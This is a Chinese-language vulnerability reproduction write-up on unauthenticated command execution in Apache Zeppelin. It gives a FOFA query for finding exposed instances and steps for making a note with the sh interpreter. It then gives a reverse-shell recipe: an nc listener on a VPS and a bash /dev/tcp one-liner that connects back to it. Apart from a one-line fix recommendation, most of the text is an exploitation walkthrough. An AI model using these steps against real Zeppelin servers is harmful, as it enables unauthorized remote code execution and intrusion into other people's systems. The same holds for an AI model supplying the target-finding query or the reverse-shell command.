0x01 漏洞简介
Apache Zeppelin是一个让交互式数据分析变得可行的基于网页的notebook。Zeppelin提供了数据可视化的框架。
Zeppelin 是一个提供交互数据分析且基于Web的笔记本。方便你做出可数据驱动的、可交互且可协作的精美文档,并且支持多种语言,包括 Scala(使用 Apache Spark)、Python(Apache Spark)、SparkSQL、 Hive、 Markdown、Shell等等
0x02 影响范围
fofa语句:title=“Zeppelin”
需要有登录的用户为:anonymouse
0x03 漏洞复现
- 访问URL,首页的样子:
进入首页后,需要有已登录的用户: anonymous,其他的不可以。 - 点击Create new note
在弹出的对话框中将Default Interpreter选择为sh:
- 然后就可以输入一些命令进行执行了
- 反弹shell
这里先设置vps监听端口,然后在命令输入框中输入bash命令进行上线操作。
-
vps中输入:nc -lvp 2345
-
在命令框中输入命令:
bash -i &>/dev/tcp/vps ip/端口号 <&1
- 这时vps上有会话进行连接,成功反弹shell。
0x04 修复建议
禁止未授权的匿名账户进行访问
参考:https://www.freebuf.com/vuls/306431.html